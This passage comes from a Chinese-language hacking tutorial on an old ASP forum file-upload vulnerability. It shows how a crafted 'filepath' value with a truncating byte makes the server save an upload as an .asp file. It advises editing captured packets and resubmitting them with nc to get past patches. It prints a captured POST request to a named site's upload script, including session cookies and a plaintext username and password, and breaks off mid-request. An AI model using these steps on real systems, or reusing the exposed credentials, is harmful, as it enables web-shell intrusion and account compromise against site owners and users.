这个

data 数组长度是 4:bbs

如果我们构造

filepath 如下,会怎么样呢?

filepath="/newmm.asp"
我们在

2004.09.24.08.24 传的文件就会发生变化

没有改时

:

_blank>http://www.***.com/bbs/uploadface/200409240824.jpg
用我们构造的

filepath 时:

_blank>http://www.***.com/newmm.asp/200409240824.jpg
这样当服务器接收

filepath 数据时,检测到 newmm.asp 后面的

就理解为

filepath 的数据就结束了

这样我们上传的文件

,比如 c:.asp

就保存成

:_blank>http://www.***.com/newmm.asp

3:后期补充
漏洞公布以后很多网站做了相应的处理

,但是对于 filepath 的过滤和处理都不行

有很多网站只是加了

n 个 hiden 属性的变量对付网上公布的 upfile.exe 就是那个

上传漏洞利用工具或者

filepath 变量利用工具(老兵的)...但是最基本的没改啊。。

而且很对网站的插件里有类似的漏洞

,我要说的不要依赖哪些专门的工具

自己改

wse 抓到的包里的 filepath 变量,然后在用 nc 提交。。。

就算他加

n 个 hiden 变量也于事无补。

当然

,如果对 filepath 做了很严格的过滤的话我们的这些理论就将宣告终结

就是我们的新理论诞生的时候

!

4:详细实例:
---------------------
一、

wse 抓包结果(存到 1.txt 里)：

post/bbs/upphoto/upfile.asphttp/1.1
accept:image/gif,image/x-xbitmap,image/jpeg,image/pjpeg,application/x-shockwave-
flash,application/vnd.ms-Excel,application/vnd.ms-powERPoint,application/msword,*/*
referer:_blank>http://www.xin126.com/bbs/upphoto/upload.asp
accept-language:zh-cn
content-type:multipart/form-data;boundary=-----------7d423a138d0278
accept-encoding:gzip,deflate
user-agent:mozilla/4.0(compatible;msie6.0;Windowsnt5.1;.netclr1.1.4322)
host:_blank>www.xin126.com
content-length:1969
connection:keep-alive
cache-control:no-cache
cookie:aspsessionidaccccdcs=njhcphpalbcankobechkjanf;iscome=1;gamvancookies=1;regtime=20
04-9-24 
3:39:37;username=szjwwwww;pass=5211314;dl=0;userid=62;ltstyle=0;logintry=1;userpass=eb03
f6c72908fd84

-----------------------------7d423a138d0278
content-disposition:form-data;name="filepath"